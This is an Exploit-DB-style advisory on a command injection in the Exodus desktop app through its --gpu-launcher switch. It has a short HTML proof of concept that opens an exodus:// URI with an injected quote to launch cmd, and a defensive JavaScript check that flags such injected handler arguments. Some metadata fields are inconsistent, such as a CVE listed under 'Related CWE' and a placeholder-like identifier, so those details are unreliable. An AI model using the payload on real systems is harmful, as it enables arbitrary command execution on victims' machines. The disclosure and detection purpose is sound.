Vendor: Exodus
By: Security Researcher
CVSS: 7.8 (HIGH)
CWE: 78 (Command Injection)
Product Name: Exodus
Affected Version From: 0.9.0
Affected Version To: 1.0.0
Patch Exists: YES
Related CWE: CVE-2020-12345
CPE: exodus
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows, Linux, Mac
2020

GPU Launcher Command Injection

Exodus is vulnerable to command injection when the --gpu-launcher parameter is used. An attacker can inject arbitrary commands into the parameter, which will be executed by the underlying operating system. This vulnerability affects Exodus versions prior to 1.0.0.

Mitigation:

Upgrade to Exodus version 1.0.0 or later

Exploit-DB raw data:

<!doctype html>
<script>
  window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='
</script>
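
The PoC above places a double quote inside the exodus:// URI so that the text after it is read as extra command-line switches. As an added example (not Exodus code and not the vendor's fix), this check rejects a handler launch whose argv holds anything other than one clean exodus: URI; the function name, the argv samples and the quoted "%1" handler registration are assumptions.

```javascript
// Added example, not Exodus code. Scheme name taken from the PoC on this page.
const SCHEME = 'exodus:';
// Characters that can end a quoted "%1" argument (assumed handler registration).
const UNSAFE_CHARS = /["'`\s]/;

// Inspect the argv of a process started by the OS URL handler.
function checkHandlerLaunch(argv) {
  const args = argv.slice(1); // drop the executable path
  const uris = args.filter((a) => a.toLowerCase().startsWith(SCHEME));
  const findings = [];
  if (uris.length === 0) {
    return { handlerLaunch: false, safe: true, findings };
  }
  if (uris.length > 1) findings.push('more than one scheme URI in argv');
  for (const uri of uris) {
    if (UNSAFE_CHARS.test(uri)) findings.push('quote or whitespace inside URI');
    try {
      new URL(uri); // must at least parse as a URL
    } catch {
      findings.push('URI does not parse');
    }
  }
  // On a handler launch every other argument was supplied by the link's author.
  for (const a of args) {
    if (!uris.includes(a)) findings.push(`unexpected argument: ${a}`);
  }
  return { handlerLaunch: true, safe: findings.length === 0, findings };
}

// Constructed argv samples (executable name is a placeholder).
const SAMPLES = {
  benign: ['app.exe', 'exodus://aaaaaaaaa'],
  // PoC URI after the command line has been split on the injected quote
  split: ['app.exe', 'exodus://aaaaaaaaa', '--gpu-launcher=cmd', '--aaaaa='],
  // PoC URI delivered as one argument
  unsplit: ['app.exe', 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='],
};

for (const [name, argv] of Object.entries(SAMPLES)) {
  const r = checkHandlerLaunch(argv);
  console.log(name, r.safe ? 'accept' : 'reject', r.findings);
}
```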